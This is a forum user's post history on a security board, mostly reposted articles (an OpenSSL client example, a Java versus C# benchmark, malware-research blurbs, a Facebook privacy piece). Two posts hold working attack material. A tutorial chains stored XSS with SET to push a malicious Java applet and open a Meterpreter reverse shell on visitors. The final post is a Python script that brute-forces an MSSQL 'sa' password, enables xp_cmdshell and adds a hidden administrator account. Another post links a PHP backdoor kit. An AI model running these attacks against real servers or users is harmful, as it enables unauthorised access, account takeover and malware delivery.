Jump to content

Nytro

Administrators
  • Posts

    18735
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. [h=2]An SSL Client Using OpenSSL[/h] by admin under c++ Recently I wrote about how to use OpenSSL to connect to a plain data server, this time I’m modifying the same code to perform encrypted connections. Naturally this is more of an example for how to use the API than production ready code. It’s main purpose is to show the very small difference between using the library as I did last time and how that example can be altered to create a basic SSL client. The essential changes to the code below are the replacement of the connection function ‘connect_unencrypted(host_and_port)‘ with ‘connect_encrypted(host_and_port, store_path, store_type, &ctx, &ssl)‘ and the introduction of the SSL cleanup step ‘SSL_CTX_free(ctx)‘. All other changes are purely cosmetic; which really shows how simple adding SSL to your application connections can be. Externally you need to provide the root CA certificate for the connection to be verified by. That’s it. At this point I could warble through the connection function, but you should just read through it yourself and consult the SSL man pages. Note that there is a dreadful buffer overflow possibility in this code and no real error handling, just a bit of logging. This is to keep the example short and also because only you will know what valid handling should take place for each situation when you write your own code. So take a look and enjoy. To try this out yourself: Make sure that you have Firefox, GCC and OpenSSL (development sources and libraries) installed. Copy the following code to a file called ‘main.c‘ in a directory that you will be playing around in. Compile the code using ‘gcc main.c -o sslclient -lssl‘ if you are on Linux or ‘gcc main.c -o sslclient -lssl-lcrypto‘ if you are on OSX. Select an SSL (https) web site to connect to and find the Root CA’s certificate name in the site’s certificate. Either export the appropriate root CA from Firefox or obtain it directly from the CA online in pem format and copy it to a file ‘certificate.pem‘ in the same directory as the ‘sslclient‘ file. Run the following command: './sslclient servername:443 "GET / \r\n\r\n" certificate.pem f e' /* * File: main.cpp * * Licence: GPL2 */ /* Standard headers */ #include <stdlib.h> #include <stdio.h> #include <string.h> /* OpenSSL headers */ #include <openssl/bio.h> #include <openssl/ssl.h> #include <openssl/err.h> /** * Simple log function */ void slog(char* message) { fprintf(stdout, message); } /** * Print SSL error details */ void print_ssl_error(char* message, FILE* out) { fprintf(out, message); fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error())); fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL)); ERR_print_errors_fp(out); } /** * Print SSL error details with inserted content */ void print_ssl_error_2(char* message, char* content, FILE* out) { fprintf(out, message, content); fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error())); fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL)); ERR_print_errors_fp(out); } /** * Initialise OpenSSL */ void init_openssl() { /* call the standard SSL init functions */ SSL_load_error_strings(); SSL_library_init(); ERR_load_BIO_strings(); OpenSSL_add_all_algorithms(); /* seed the random number system - only really nessecary for systems without '/dev/random' */ /* RAND_add(?,?,?); need to work out a cryptographically significant way of generating the seed */ } /** * Close an unencrypted connection gracefully */ int close_connection(BIO* bio) { int r = 0; r = BIO_free(bio); if (r == 0) { /* Error unable to free BIO */ } return r; } /** * Connect to a host using an unencrypted stream */ BIO* connect_unencrypted(char* host_and_port) { BIO* bio = NULL; /* Create a new connection */ bio = BIO_new_connect(host_and_port); if (bio == NULL) { print_ssl_error("Unable to create a new unencrypted BIO object.\n", stdout); return NULL; } /* Verify successful connection */ if (BIO_do_connect(bio) != 1) { print_ssl_error("Unable to connect unencrypted.\n", stdout); close_connection(bio); return NULL; } return bio; } /** * Connect to a host using an encrypted stream */ BIO* connect_encrypted(char* host_and_port, char* store_path, char store_type, SSL_CTX** ctx, SSL** ssl) { BIO* bio = NULL; int r = 0; /* Set up the SSL pointers */ *ctx = SSL_CTX_new(SSLv23_client_method()); *ssl = NULL; /* Load the trust store from the pem location in argv[2] */ if (store_type == 'f') r = SSL_CTX_load_verify_locations(*ctx, store_path, NULL); else r = SSL_CTX_load_verify_locations(*ctx, NULL, store_path); if (r == 0) { print_ssl_error_2("Unable to load the trust store from %s.\n", store_path, stdout); return NULL; } /* Setting up the BIO SSL object */ bio = BIO_new_ssl_connect(*ctx); BIO_get_ssl(bio, ssl); if (!(*ssl)) { print_ssl_error("Unable to allocate SSL pointer.\n", stdout); return NULL; } SSL_set_mode(*ssl, SSL_MODE_AUTO_RETRY); /* Attempt to connect */ BIO_set_conn_hostname(bio, host_and_port); /* Verify the connection opened and perform the handshake */ if (BIO_do_connect(bio) < 1) { print_ssl_error_2("Unable to connect BIO.%s\n", host_and_port, stdout); return NULL; } if (SSL_get_verify_result(*ssl) != X509_V_OK) { print_ssl_error("Unable to verify connection result.\n", stdout); } return bio; } /** * Read a from a stream and handle restarts if nessecary */ ssize_t read_from_stream(BIO* bio, char* buffer, ssize_t length) { ssize_t r = -1; while (r < 0) { r = BIO_read(bio, buffer, length); if (r == 0) { print_ssl_error("Reached the end of the data stream.\n", stdout); continue; } else if (r < 0) { if (!BIO_should_retry(bio)) { print_ssl_error("BIO_read should retry test failed.\n", stdout); continue; } /* It would be prudent to check the reason for the retry and handle * it appropriately here */ } }; return r; } /** * Write to a stream and handle restarts if nessecary */ int write_to_stream(BIO* bio, char* buffer, ssize_t length) { ssize_t r = -1; while (r < 0) { r = BIO_write(bio, buffer, length); if (r <= 0) { if (!BIO_should_retry(bio)) { print_ssl_error("BIO_read should retry test failed.\n", stdout); continue; } /* It would be prudent to check the reason for the retry and handle * it appropriately here */ } } return r; } /** * Main SSL demonstration code entry point */ int main(int argc, char** argv) { char* host_and_port = argv[1]; /* localhost:4422 */ char* server_request = argv[2]; /* "GET / \r\n\r\n" */ char* store_path = argv[3]; /* /home/user/projects/sslclient/certificate.pem */ char store_type = argv[4][0]; /* f = file, anything else is a directory structure */ char connection_type = argv[5][0]; /* e = encrypted, anything else is unencrypted */ char buffer[4096]; buffer[0] = 0; BIO* bio; SSL_CTX* ctx = NULL; SSL* ssl = NULL; /* initilise the OpenSSL library */ init_openssl(); /* encrypted link */ if (connection_type == 'e') { if ((bio = connect_encrypted(host_and_port, store_path, store_type, &ctx, &ssl)) == NULL) return (EXIT_FAILURE); } /* unencrypted link */ else if ((bio = connect_unencrypted(host_and_port)) == NULL) return (EXIT_FAILURE); write_to_stream(bio, server_request, strlen(server_request)); read_from_stream(bio, buffer, 4096); printf("%s\r\n", buffer); if (close_connection(bio) == 0) return (EXIT_FAILURE); /* clean up the SSL context resources for the encrypted link */ if (connection_type == 'e') SSL_CTX_free(ctx); return (EXIT_SUCCESS); } Sursa: An SSL Client Using OpenSSL
  2. Java vs. C#: Which Performs Better in the ‘Real World’? by Jeff Cogswell | January 17, 2013 Java and C# each have their fans (and detractors). But which language wins out in a set of real-world performance tests? Let’s compare Java and C#, two programming languages with large numbers of ardent fans and equally virulent detractors. Despite all the buzzing online (“I’m about to rant. Who else hates working in C#?” one blog might complain, even as another insists: “Java ruined my life.”), it’s hard to find real-life benchmarks for each language’s respective performance. What do I mean by real life? I’m not interested in yet another test that grindingly calculates a million digits’ worth of Pi. I want to know about real-world performance: How does each language measure up when asked to dish out millions of Web pages a day? How do they compare when having to grab data from a database to construct those pages dynamically? These are the kinds of stats that tech folk like to know when choosing a platform. Before we get started, we need to establish some terminology. When you write Java code, you usually target the Java Virtual Machine (JVM). In other words, your code is compiled to bytecode, and that bytecode runs under the management of the JVM. C#, meanwhile, generally runs under the Microsoft Common Language Runtime (CLR). C# is similarly compiled to bytecode. Java and C#, then, are really just languages. In theory you could write Java code that targets the Microsoft CLR, and you could write C# code that targets the JVM. Indeed, there are several languages that target the JVM, including Erlang, Python, and more. The most common languages targeting the CLR (in addition to C#) is Microsoft’s own Visual Basic.NET, as well as their own flavor of C++ called C++.NET. The CLR also offers support for several less-common languages, including Python and Microsoft’s own F#. Further, the two runtimes include frameworks that are a set of classes written by Oracle/Sun and Microsoft for the JVM and CLR, respectively. Oracle has its Java Platform, along with various APIs. Microsoft’s .NET framework is a huge set of classes supporting development for the CLR; indeed, most people simply refer to the system as .NET rather than CLR. As such, we need to lay some groundwork for what we’re trying to accomplish. First, we’re not really comparing the languages themselves. What we need to compare is the underlying runtime. But even more than that, we need to also compare the performance of the frameworks. Therefore I’m going to do multiple comparisons, but ultimately try to match up apples to apples. For example, it’s very possible to write your own HTTP listener in either C# or Java, and just send back an HTML page generated dynamically. But the reality is, almost nobody actually writes a low-level HTTP listener; instead, they tend to use existing HTTP servers. Most C# web apps rely on Microsoft’s IIS server. Server-side Java, on the other hand, can work with several different servers, including the Apache HTTP server and the Tomcat server. (Tomcat, for example, was built specifically to interact with server-side Java.) While we want to compare apples to apples, we want to stay realistic. The servers will very likely play a role in the responses, as one might be faster than the other. Even though the HTTP servers are not technically part of the runtime, they are almost always used, and will therefore play a factor—that’s why, after a first test in which we skip those servers and write our own small HTTP servers, we’ll try similar tests with the respective HTTP servers to get a more complete and accurate picture. Static files are another issue, and I’m going to stay clear of them. Some of you may disagree, but with today’s architectures, if you seek fast performance for static files such as JavaScript or CSS files, you can easily put them on a cloud server that has replication across the country, use DNS configurations to locate the closest one to the client, and send them down very quickly. So for that reason I’m going to skip that part. Plus, if you’re trying to maximize performance, you probably don’t want your Web application dishing out static files when it should be focusing on doing its real work of reading databases, building dynamic content, and so on. A Quick Note on the Hardware I want to make sure the hardware in question introduces as few extraneous variables as possible. My own development machine has a ton of software on it, including many services that start up and steal processor time. Ideally, I would devote one entire core to the Java or C# process, but unfortunately the core allocation works the other way; you can limit a process to a single core, but you can’t stop other processes from using that core. So instead I’m allocating large servers on Amazon EC2, with close-to-barebones systems. Because I don’t want to compare Linux to Windows, and C# is primarily for Windows (unless we bring Mono in, which we’re not), so I’ll run all tests on Windows. On the client end, I don’t want network latency to interfere with the results either. A moment of slowness during one test would throw off the results. So I made the decision to run the client code on the same machine. While I can’t force the OS to reserve cores to a single process, I can force each process into a single core, which is what I did. Collecting the Results The results are timed on the client side. The optimal way to do this involves capturing the time and saving it, capturing the time again as needed, and continuing that way, without performing any time calculations until everything is done. Further, don’t print out anything at the console until all is done. One mistake I’ve seen people make is to grab a time at given points, and also at each point calculate the time difference and print it to the console. Consoles are slow, especially if they’re scrolling. So we’ll wait until we’re finished before calculating the time differences and writing to the console. The Client Code It doesn’t really matter what we use for the client code as long as we use it consistently in all tests. The client code will mimic the browser and time how long it takes to retrieve a page from the server. I can use either C# or Java. I ended up using C# because there is a very easy WebClient class, and an easy timer class. First Test: Listening for HTTP Let’s get started. The first test will simply be code that opens an HTTP listener and sends out dynamically generated Web pages. First: the Java version. There are many ways we can implement this, but I want to draw attention to two separate approaches: one is to open a TCP/IP listener on port 80, and wait for incoming connections—this is a very low-level approach where we would use the Socket class. The other is to use the existing HttpServer class. I’m going to use the HttpServer class, and here’s why: If we really want to track the speed of a Java compared to C#, without the Web, we can run some basic benchmarks that don’t involve the Web; we could create two console applications that spin a bunch of mathematical equations and perhaps do some string searching and concatenation—but that’s a topic for another day. We’re focusing on the Web here, so I’ll start with the HttpServer, and similarly with the equivalent in C#. Right off the bat I find what appears to be an anomaly: the Java version takes almost 2000 times as long to complete each request. Processing 5 requests in a row takes a total of 17615 ticks when retrieving a string from a CLR program that uses the HttpListener class, whereas processing 5 requests to the Java server running the HttpServer class takes 7882975 ticks. (When I switch to milliseconds, I see numbers such as 4045 milliseconds to process 15 requests on the Java server, and only 2 milliseconds to process 15 requests on the C# server.) Adding some debugging info to the Java server, I discover that the function responsible for responding to incoming requests and sending out data actually runs quickly—nowhere near the three seconds or so being reported. The bottleneck appears to be somewhere in the Java framework, when the data is sent back to the client. But the problem doesn’t exist when communicating with the C# client. To get to the bottom of this one, I decide to switch to a different Java client. Instead of using the heavier HttpServer class, I instead create a simple TCP/IP socket listener using the ServerSocket class. I manually construct a header string and a body that matches what I’m sending down in the C# version. After that, I see a huge improvement. I can run a large number of tests; I perform 2000 requests, one after the other, but not gathering the time until the 2000 calls to the Java server are finished; then I perform a similar process with the C# server. In this case, I can use milliseconds for the measurement. Calling the Java server 2000 times takes 2687 milliseconds. Calling the C# server 2000 times takes 214 milliseconds. The C# one is still much faster. Because of this discrepancy, I feel compelled to try out the Java version on a Linux server. The server used is a “c1.medium” on Amazon EC2. I install the two different Java classes and see essentially the same speeds. The HttpServer class takes about 14 seconds to process 15 requests. Not very good. And finally, to be absolutely sure, I write an equivalent client program in Java that retrieves the data. It records similar times as well. Second Test: Full Website It’s rare that people roll their own HTTP servers. Instead, C# programmers usually use IIS; Java programmers have a few choices, including TomCat. For my tests I’m going to utilize those two servers. For C#, I’m going to specifically use the ASP.NET MVC 4 platform running on IIS 8. I’m going to take two approaches: first, returning a string of HTML from the controller itself; for the second I’ll return a view that includes a date/time lookup. For the Java tests, I can do two similar approaches. I can have a servlet return some HTML, or I can return the results of a JSP page. These are analogous to the C# controller and View approaches, respectively. I could use the newer Java Faces or any number of other frameworks; if you’re interested, you might try some tests against these other frameworks. The C# controller simply returns a string of HTML. Running my client test for 2000 iterations sees a time of 991 milliseconds total. That’s still faster than my Java socket version. The view version of the C# app creates a full standards-compliant HTML page, with an HTML element, head element, meta element, title element, body element, and an inner div element containing the text “The date and time is” followed by the full date and the full time. The date and time are retrieved through the DateTime.Now instance, and filled in dynamically with each request. Running the client test for 2000 iterations against this view version takes 1804 milliseconds; about twice as long as the direct one. The direct one returns shorter HTML, but increasing the size of the HTML string to match the view version shows no difference; it hovers around the 950-1000 millisecond time. Even adding in the dynamic date and time doesn’t result any noticeable increase. The view version takes twice as long as the controller version, regardless. Now let’s move on to Java. The servlet is just as simple as the controller in the C# version. It just returns a string that contains an HTML page. Retrieving 2000 instances takes 479 milliseconds. That’s roughly half the time as the C# controller—very fast indeed. Returning a JSP page is also fast. As with C#, it takes a bit longer than the controller. In this case, retrieving 2000 copies takes 753 milliseconds. Adding in a call in the JSP file to retrieve the date makes no noticeable difference. In fact, the Tomcat server apparently performs some optimization, because after a few more requests, the time to retrieve 2000 copies went all the way down to 205 milliseconds. Conclusion These results are quite interesting. Having worked as a professional C# programmer for many years, I’ve been told anecdotally that .NET is one of the fastest runtimes around. Clearly these tests show otherwise. Of course, the tests are quite minimal; I didn’t do massive calculations, nor did I do any database lookups. Our space is limited here, but perhaps another day soon I can add in some database tests and report back. Meanwhile, Java is the clear winner here. Image: Bjorn Hoglund/Shutterstock.com slashdot (Java vs. C#: Which Performs Better in the 'Real World'?) Sursa: Java vs. C#: Which Performs Better in the 'Real World'?
  3. Detecting System Intrusions Prepared on January 15, 2013 by: Demyo Inc. is one hundred percent IT security oriented company with headquarters in Miami, Florida, USA. Demyo Inc. delivers comprehensive penetration testing, vulnerability assessment, incident response, and compliance audit services just to name a few. Find out more at: Demyo, Inc. info@demyo.com Introduction First things first, detecting system intrusion its not the same as Intrusion Detection System/Intrusion Prevention System (IDS/IPS). We want to detect system intrusion once attackers passed all defensive technologies in the company, such as IDS/IPS mentioned above, full packet capture devices with analysts behind them, firewalls, physical security guards, and all other preventive technologies and techniques. Many preventing technologies are using blacklisting [1] most of the time, and thus that’s why they fail. Blacklisting is allowing everything by default, and forbidding something that is considered to be malicious. So for attacker it is a challenge to find yet another way to bypass the filter. It is so much harder to circumvent a whitelisting system. Download: www.exploit-db.com/download_pdf/24155
  4. PHP Kit 0.2a Authored by infodox PHPkit is a simple PHP based backdoor, leveraging include() and php://input to allow the attacker to execute arbitrary PHP code on the infected server. The actual backdoor contains no suspicious calls such as eval() or system(), as the PHP code is executed in memory by include(). Download: http://packetstormsecurity.com/files/download/119637/phpkit-0.2a.tar.gz Sursa: PHP Kit 0.2a ? Packet Storm
  5. Cve-2011-3402 Technical Analysis Description: CVE-2011-3402 is well known as the Windows Kernel TrueType 0-day used in the Duqu attack(s). Recently this exploit has begun to appear in several crimeware exploit kits... Actually, not merely just the exploit, but the entire font file used by Duqu, now being harnessed to infect a large population with malware. This talk will mostly be an extremely low-level walk-through of the font program within this TrueType font, which is used to manipulate the Windows Kernel into executing the native x86 shellcode. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Cve-2011-3402 Technical Analysis
  6. Zeus -- Registry Analysis Using Volatility Framework Description: In this video I will show you how to analysis a registry from the memory using Volatility Framework. In this video I’m using Zeus Memory for registry analysis, and l will show F-secure top10 malware registry launchpoints. Not all but some of them Download Zeus Memory : - http://malwarecookbook.googlecode.com/svn-history/r26/trunk/17/1/zeus.vmem.zip Most trojans, worms, backdoors, and such make sure they will be run after a reboot by introducing autorun keys and values into the Windows registry. Some of these registry locations are better documented than others and some are more commonly used than others. One of the first steps to take when doing forensic analysis is to check the most obvious places in the registry for modifications. Source : - Top10 malware registry launchpoints - F-Secure Weblog : News from the Lab Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Zeus -- Registry Analysis Using Volatility Framework
  7. Gsm: Cell Phone Network Review Description: Did you notice 262 42 in your mobile phone network search list at the last CCC events? Did you and your friends buy SIM cards at the PoC and help test the network by calling each other, or by calling through the bridge to the DECT network services? Did you ever wonder about the details of this open source test network, set up by a team of volunteers in the middle of the city? We would like to tell you all the details of the cell phone network we operate at 29C3, and show you some fancy graphs based on the network activity! We will describe the process of setting up the test network we operate at 29C3, what legal and technical challenges we have faced, and we will describe the actual installation at the CCH. We will also compare this with the 262 42 test networks that were operated using the same open source software but otherwise very different installations at CCC Camp 2011 and 28C3. We will go on to show various statistics that we collect from the network while it has been running. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Gsm: Cell Phone Network Review
  8. Ipv6 Domain Scanner Description: In this video I will show you how to use dnsdict6. In this video I will use this tool on Google and getting subdomain with ipv6 and services. Dnsdict6 tool is very powerful fast and easy to use. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ipv6 Domain Scanner
  9. [h=1]"Red October" - part two, the modules[/h]GReAT Kaspersky Lab Expert Posted January 17, 14:21 GMT Earlier this week, we published our report on “Red October”, a high-level cyber-espionage campaign that during the past five years has successfully infiltrated computer networks at diplomatic, governmental and scientific research organizations. In part one, we covered the most important parts of the campaign: the anatomy of the attack, a timeline of the attacker’s operation, the geographical distribution of the victims, sinkhole information and presented a high level overview of the C&C infrastructure. Today we are publishing part two of our research, which comprises over 140 pages of technical analysis of the modules used in the operation. When analyzing targeted attacks, sometimes researchers focus on the superficial system infection and how that occurred. Sometimes, that is sufficient, but in the case of Kaspersky Lab, we have higher standards. This is why our philosophy is that it’s important to analyze not just the infection, but to answer three very important questions: What happens to the victim after they’re infected? What information is being stolen? Why is “Red October” such a big deal compared to other campaigns like Aurora or Night Dragon? According to our knowledge, never before in the history of ITSec has an cyber-espionage operation been analyzed in such deep detail, with a focus on the modules used for attack and data exfiltration. In most cases, the analysis is compromised by the lack of access to the victim’s data; the researchers see only some of the modules and do not understand the full purpose of the attack or what was stolen. To get around these hiccups, we set up several fake victims around the world and monitored how the attackers handled them over the course of several months. This allowed us to collect hundreds of attack modules and tools. In addition to these, we identified many other modules used in other attacks, which allowed us to gain a unique insight into the attack. The research that we are publishing today is perhaps the biggest malware research paper ever. It is certainly the most complex malware research effort in the history of our company and we hope that it sets new standards for what anti-virus and anti-malware research means today. Because of its size, we've split "part 2" in several pieces, to make reading easier: [h=2]First stage of attack[/h] Exploits Dropper Loader Module Main component [h=2]Second stage of attack[/h] Modules, general overview Recon group Password group Email group USB drive group Keyboard group Persistence group Spreading group Mobile group Exfiltration group Sursa: "Red October" - part two, the modules - Securelist
  10. Vba32 AntiRootkit is designed to analyze the computer for the anomalies that arise due to the presence of malware in the system. Due to this, you will be able to detect and neutralize both the known and unknown viruses that are present in your system in active state. This program is a good assistant in the work of a specialist struggling with complicated infections. Vba32 AntiRootkit advantages: Free of charge Does not require installation Can be used with any antivirus software installed on your computer Uses a unique feature of the detection of "clean" files Can be used in several modes Supports the maintenance of a system status report in html format Treatment of the system may be done using a scripting language Supports Windows 7 Help files in Russian and English languages Part of Vba32 Personal and Vba32 Check To analyze the system is just enough to run the utility and click Start button, or select the menu File->Logging State (if you wish to get the report in the html format). Done! md5: 033aaa0c8d172d68e97c6e1cc3fb6461 sha1: 8872c8df8fa008a1222333b895ac6b42caefb347 Download FREE version Download User Guide (CHM, English) Discussion forum Sursa: Vba32 AntiRootkit | FREE Utilities | VirusBlokAda
  11. Whoa, imi arata hook-urile pe SSDT de la Kaspersky, me gusta
  12. Lasa OOP-ul, PHP-ul si alte rahaturi, in primul rand, ca sa iei admiterea, trebuie sa stii C/C++ si algoritmica la un nivel decent. Apoi ai timp si de altele. Iti recomand insa sa te astepti si la multa matematica indesata pe gat, chiar si la admitere. PS: Cel putin asa e la Universitatea Bucuresti.
  13. [h=1]Google Tracked Web Users Bypassing iPhone Security[/h] This is an era where innovative technologies hit the market on a regular basis. In fact, humans have been quite accustomed to the technological changes that take place so frequently. Also, lives of people have become too much dependent on these modern innovative technologies. Be it internet, mobile smartphone, or television media, people have become extremely intoxicated to using these devices. With enormous advantages of modern communication devices and internet, there is also some point of concern as well. Data breach, security hacking, and unethical business practices through the help of modern technologies have become more severe these days. Recently, Wall Street journal published an unethical business practice that is making waves in the mobile communication market. The journal accused major online advertising companies like Google for compromising the security settings of different iPhone as well Apple desktop users who runs the safari browser in their devices. Wall Street Journal not only accused Google but also other major online advertising firms like Point Roll, Vibrant Media, and WPP that used some specific code to trick the extremely popular web browser Safari. This allowed them to secretly monitor the behavior of the iPhone users by bypassing default security settings that has been designed in some particular manner to block such intrusions. In fact, bypassing security settings is not the correct approach to track user behavior or for understanding the commercial cycles. This attempt not only kept most of the iPhone and Safari Browser users in dark, but it all questioned the overall security and privacy policies of these notable advertisers. It can also be recalled that Apple’s privacy settings (default) definitely disallows any company to use cookies for tracking user behavior while using different web enabled services. However, notable advertisers like Google and others never took any time to think twice before breaching the security for mere commercial tracking purpose. And what for? To achieve some commercial gains! It's surely a rubbish and insulting approach from these notable advertisers. They should be sued for their conduct. Strong apology from these advertisers is expected. Well, an amazing fact is that till now Google or any of the other advertisers have never pledged for an apology regarding their unprofessional behavior. Isn't it funny? This means they will again carryout such activities in the near future. However, they have disabled the secret tracking code once Wall Street published about their dirty activities, but remained unapologetic. Instead, they tried to convince people with the fact that Wall Street misunderstood their approach completely. In a public statement, Google addressed that cookies used by them were not for tracking any sort of public behavior. In fact, those cookies were not powerful enough to collect any type of personal information. Other companies involved in such security breach issues also never admitted their guilt. Many of these advertisers said that they were totally unaware of such security breach or any of the illegal activities. There are many tech and web companies that offer free products and then earns through online advertising. But, also remember that these companies often try to act too smartly while trying to cross the privacy line of clients to learn about customer behavior. All for commercial gains, such approach may not help in creating a positive reputation for that particular company. Breaching security is a serious offense and can result in legal initiatives. About the author: Margaret is a blogger by profession. She loves writing, reading and travelling. She is an avid golfer and answers how much to ship golf clubs by suggesting Shipsticks golf. Sursa: Google Tracked Web Users Bypassing iPhone Security | Ethical Hacking-Your Way To The World Of IT Security
  14. Facebook Graph Search may be a social engineering nightmare Facebook's new search engine serves up the kind of data that cyber scammers love By Ted Samson | InfoWorld Facebook's newly unveiled Graph Search search engine is an intriguing marriage of social networking and big data, creating opportunities for people to easily connect with prospective business partners, customers, friends, dates, and so on. At the same time, it's tough to ignore that Graph Search could be used as an on-tap source of social engineering data, which cyber scammers and malicious hackers could use and abuse in any number of ways. If you missed Facebook's big announcement about Graph Search, it's basically a Facebook search engine with which you can track down Facebook users who meet particular criteria (say, people who live in Chicago and are software developers). You can also search for pictures or businesses that meet particular criteria (such as "pictures of my friends at Disneyland" or "attorneys that my friends recommend.") Social engineering entails using personal details about a victim (where they work, where they went to school, who they're married to, what their interests are) to gain trust so that you can scam them, hack them, or otherwise take advantage. Hacking competitions in recent years have added social engineering events as the tactic has gained in popularity. Graph Search appears to be well suited for serving up the very data that scammer might use to dupe a target. Though Graph Search not yet available to users, Facebook is offering a glimpse of what it search might yield. Based simply on the outcome of a sample search, I could see how the tool could be used to quickly gather enough personal data about fellow Facebook users to successfully launch social-engineering-style attacks. For my sample search, I logged in with a bogus Facebook account I created long ago when I was interested in playing admittedly insipid Facebook games -- the ones that require you to have as many Facebook friends as possible in order to advance. I have around 445 friends on this account; I know there are other Facebook game-players with more -- as well as an underground market for such accounts. I clicked the sample Graph Search search button, and it looked up "people who live in my city." In this case, the city was New York, New York, per my account settings. The search results included a list of 12 people, none of whom I know in real life. As far as I can tell, they are all either Facebook friends or friends of friends. To me, they're all strangers on the Internet. Accompanying the dozen search results are the users' names and a profile picture, along with such data as where they live, how old they are, where they work or attend school, whether they are in a relationship, what sort of music they like, what interests they have, and the Facebook friends we have in common. All of that data could be used for social-engineering-style chicanery. Bear in mind, too, that this is a sample search, and I didn't even get to choose the criteria. As Facebook describes Graph Search, you'll be able to perform far more granular searches (searches for pictures with select people or searches for businesses your friends recommend), which can be useful but can also be wielded for potentially more pointed attacks. Facebook has stressed that the data that shows up in the Graph Search searches is data users have chosen to make public. But keep in mind: A lot of clueless, ignorant, and/or overly trusting users out there don't necessarily know how to protect themselves online, not even in a sandbox like Facebook where security controls aren't that hard to find. Here's what Facebook had to say about Graph Search and privacy: When you share something on Facebook, you get to decide exactly who can see that content. This, of course, is why Graph Search is such a powerful experience: A lot of what you will find is content that is not public, but content that someone has shared with a limited audience that happens to include you.... One challenge in particular is worth calling out. Consider the relatively simple Graph Search query, "Photos of Facebook employees." For starters, we make sure that only photos that the owner has shared with the person conducting the search can be seen on the photo results page. But we have also to make sure that each photo features at least one person who has shared with the searcher that they work at Facebook! Otherwise we would implicitly be revealing content that the searcher does not have access to. Although it's nice to know that Facebook is aware of the security challenge, one has to wonder whether the company will be able to maintain a handle on keeping private data private with so much data and so many "privacy checks" running in the background. Graph Search is slated for release this summer, with beta testing opening up to select users in the interim. Time will tell whether privacy and security concerns are warranted. This story, "Facebook Graph Search may be a social engineering nightmare," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: Facebook Graph Search may be a social engineering nightmare | Internet privacy - InfoWorld
  15. Mai bine modifici /etc/hosts cu domeniile .geek, mai simplu. Asa putem face si noi domenii .rst.
  16. Stored XSS And SET Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS. In real world scenarios once a stored XSS vulnerability have discovered,the penetration tester reports the issue and provides a brief explanation in the final report about the potential risks but he doesn’t continue the attack as it is not necessary except if the client asks it.However a malicious attacker will not stop there and he will try to attack the users by combining tools and methods.So in this article we will examine how an attacker can use SET with a stored XSS in order to obtain shells from users. First of all stored XSS can be discovered in web applications that are allowing the users to store information like comments,message boards,page profiles,shopping carts etc.Let’s say that we have a web application with the following form: Comment Form Vulnerable to XSS In order to test it for XSS we will try to pass into the comment field the following script: Alert Box – JavaScript Code The result will be the following: Comment Field Vulnerable to XSS Now that we know where the vulnerability exists we can launch the social engineering toolkit. SET – Menu The attack that we are going to choose is the Java Applet Attack Method. Java Applet Attack Method We will enter our IP address in order the reverse shell to connect back to us and we will choose the first option which is Java Required. SET Configurations Next we will have to choose our payload and our encoder.In this case we will select to use as a payload a simple Meterpreter Reverse TCP and as a encoder the famous shikata_ga_nai. SET – Encoders Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS. Malicious JavaScript Code When a user will try to access the page that contains the malicious JavaScript the code will executed in his browser and a new window will come up that will contain the following message: Fake message trying to convince the user to run the java applet After a while the user will notice a pop-up box that it will ask him if he wants to run the Java applet. Malicious Java Applet If the user press on the Run button the malicious code will executed and it will return us a shell. Remote Shell Conclusion As we saw stored XSS can be very dangerous as the JavaScript code executed once the unsuspected user has visited the vulnerable page.In this article the malicious attacker wanted to redirect the user to another page in order to run the malicious Java applet that lead to a shell.A potential attacker can use many tools with different arbitrary codes combined together in order to achieve his goal so regular penetration tests is a necessity for every company that wants to defend herself from non-ethical hackers. Sursa: Stored XSS And SET
  17. SQL Brute Force Script The purpose of this script is to perform a brute force attack on an SQL database.The script will try to connect to the remote host with the administrative account sa and with one password that will be valid from the file pass.txt.If the connection is successful then it will try to enable the xp_cmdshell and add a new user on the remote host. Author: Larry Spohn Website: http://e-spohn.com Twitter: @Spoonman1091 Credits: Dave Kennedy #!/usr/bin/python import _mssql # mssql = _mssql.connect('ip', 'username', 'password') # mssql.execute_query() passwords = file("pass.txt", "r") ip = "192.168.200.128" for password in passwords: password = password.rstrip() try: mssql = _mssql.connect(ip, "sa", password) print " [*] Successful login with username 'sa' and password: " + password print " [*] Enabling 'xp_cmdshell'" mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;") mssql.execute_query("RECONFIGURE;") print " [*] Adding Administrative user" mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'") mssql.close() print " [*] Success!" break except: print "[!] Failed login for username 'sa' and password: " + password Sursa: SQL Brute Force Script
